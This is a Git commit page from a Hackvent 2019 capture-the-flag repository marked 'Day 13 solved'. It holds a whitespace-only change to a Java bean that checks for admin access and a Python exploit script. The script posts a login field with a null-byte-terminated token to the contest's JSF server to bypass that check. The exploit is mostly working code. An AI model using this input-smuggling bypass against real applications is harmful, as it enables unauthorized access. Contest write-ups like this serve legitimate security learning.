Roman/Hackvent_2019
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Day 13 solved

Browse Source
This commit is contained in:
Roman Hergenreder 2019-12-13 21:33:46 +01:00
parent f36aa42aa9
commit 97efd59a23
2 changed files with 48 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
Day 13/NotesBean.java
View File

@ -16,7 +16,7 @@ import org.apache.commons.io.IOUtils;
public class NotesBean implements Serializable { public class NotesBean implements Serializable {
/** /**
* *
*/ */
private PatriciaTrie<Integer> trie = init(); private PatriciaTrie<Integer> trie = init();
private static final long serialVersionUID = 1L; private static final long serialVersionUID = 1L;
@ -42,18 +42,20 @@ public class NotesBean implements Serializable {
public void setTrie(String note) { public void setTrie(String note) {
trie.put(unescapeJava(note), 0); trie.put(unescapeJava(note), 0);
} }
private static PatriciaTrie<Integer> init(){
PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
trie.put(securitytoken,0);
private static PatriciaTrie<Integer> init(){ return trie;
PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>(); }
trie.put(securitytoken,0);
return trie;
}
private static boolean isAdmin(PatriciaTrie<Integer> trie){ private static boolean isAdmin(PatriciaTrie<Integer> trie){
return !trie.containsKey(securitytoken); return !trie.containsKey(securitytoken);
} }
private static InputStream getStreamFromResourcesFolder(String filePath) {
return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
}
private static InputStream getStreamFromResourcesFolder(String filePath) {
return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
}
} }

34
Day 13/exploit.py Normal file
View File

@ -0,0 +1,34 @@
#!/usr/bin/python
import requests
from bs4 import BeautifulSoup as bs
URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"
session = requests.session()
# Get view state
response = session.get(URL)
if response.status_code != 200:
print("Server returned %d %s" % (response.status_code, response.reason))
exit(1)
html = bs(response.text, 'lxml')
viewState = html.find("input", { "id": "javax.faces.ViewState" })
if viewState is None:
print("Could not find javax.faces.ViewState")
exit(2)
params = {
"j_idt14": "j_idt14",
"j_idt14:j_idt15": "login",
"j_idt14:name": "auth_token_4835989\0",
"javax.faces.ViewState": viewState['value']
}
response = session.post(URL, data=params)
if response.status_code != 200:
print("Server returned %d %s" % (response.status_code, response.reason))
exit(1)
print(response.text)